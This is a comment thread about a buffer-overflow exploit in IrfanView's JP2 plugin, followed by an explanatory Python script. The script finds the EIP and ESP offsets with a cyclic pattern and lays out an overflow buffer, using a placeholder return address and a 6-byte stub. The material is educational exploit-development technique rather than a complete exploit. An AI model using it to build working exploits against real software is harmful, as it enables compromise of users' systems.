2 comments on “IrfanView PlugIns JP2 Image Processing Buffer Overflow Exploit”

  1. Hi,

    Could you explain what you mean by “these are the offset for the vulnerability”?
    Also, you write “ESP contains 6 bytes of our buffer”. What does that mean? Since ESP is the stack pointer, does that mean only 6 bytes from the buffer are on the stack?

    Thanks :)

  2. Well, for the QCD data: when overflowing the buffer due to an incorrect QCD, our EIP is overwritten after 196 bytes of data are entered. Yes, only 6 bytes end up on our stack that we control.
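
To make the two numbers in the reply concrete (196 bytes to EIP, 6 controlled bytes at ESP), here is an added worked example of how such offsets are normally established and how the resulting buffer is laid out. It is not the post's exploit and not the commenter's code. The cyclic pattern is the usual Metasploit-style Aa0Aa1... pattern; `simulate_crash` is a constructed stand-in for the crashing plugin (we have no target here), and the `ret_addr` placeholder passed to `build_buffer` is an assumed value, since the thread gives no address.

```python
import struct

# Character classes of the Metasploit-style cyclic pattern (Aa0Aa1Aa2...).
UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGIT = "0123456789"


def cyclic_pattern(length):
    """Return `length` bytes of the Aa0Aa1Aa2... pattern.

    Every 4-byte window is unique within the first 20280 bytes, so a dword
    that lands in a register maps back to exactly one offset in the buffer.
    """
    out = bytearray()
    for u in UPPER:
        for lo in LOWER:
            for d in DIGIT:
                out += (u + lo + d).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("pattern longer than 20280 bytes is no longer unique")


def pattern_offset(pattern, reg_value):
    """Map a register value read from the debugger back to its offset.

    x86 loads the dword little-endian, so a register showing 0x67413567
    was fed the bytes b"g5Ag" in that order; pack with "<I" to search.
    """
    idx = pattern.find(struct.pack("<I", reg_value))
    if idx == -1:
        raise ValueError("value does not come from the pattern")
    return idx


def simulate_crash(buf, eip_offset, esp_bytes):
    """Constructed stand-in for the crashing target (assumption, not the
    real plugin): return what EIP and the bytes at ESP would hold if the
    overflow overwrote the saved return address with
    buf[eip_offset:eip_offset+4] and left the next `esp_bytes` bytes of the
    buffer on the stack, right where ESP points after the ret."""
    eip = struct.unpack("<I", buf[eip_offset:eip_offset + 4])[0]
    at_esp = buf[eip_offset + 4:eip_offset + 4 + esp_bytes]
    return eip, at_esp


def find_offsets(eip_seen, pattern, esp_bytes_seen):
    """Turn the debugger observations (EIP value, bytes dumped at ESP)
    into the numbers quoted in the thread: the EIP offset, the offset of
    the ESP bytes in the buffer, and how many of them are controlled."""
    return {
        "eip_offset": pattern_offset(pattern, eip_seen),
        "esp_offset": pattern.find(esp_bytes_seen),
        "esp_controlled": len(esp_bytes_seen),
    }


def build_buffer(eip_offset, ret_addr, esp_stub, esp_bytes=6, filler=b"A"):
    """Lay out filler, the 4-byte return-address overwrite and the short
    stub that ESP will point at.  `ret_addr` is a placeholder; a usable
    value depends on the target and is not given by the thread.  Only
    `esp_bytes` (6 per the reply) of stub fit, so it cannot hold a full
    payload and must hand control elsewhere."""
    if len(esp_stub) > esp_bytes:
        raise ValueError("only %d bytes at ESP are controlled" % esp_bytes)
    return filler * eip_offset + struct.pack("<I", ret_addr) + esp_stub


if __name__ == "__main__":
    pat = cyclic_pattern(300)
    eip, at_esp = simulate_crash(pat, 196, 6)
    print("EIP=0x%08x, bytes at ESP=%r" % (eip, at_esp))
    print(find_offsets(eip, pat, at_esp))
```

Usage: send the pattern instead of the real QCD payload, read EIP and the first bytes at ESP from the debugger at the crash, and feed them to `find_offsets`; the offsets it returns are what "these are the offset for the vulnerability" refers to. The 6-byte figure is the answer to the second question: only that much of the buffer sits at ESP after the return, which is why the stub placed there is tiny and typically just redirects execution rather than doing any real work.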
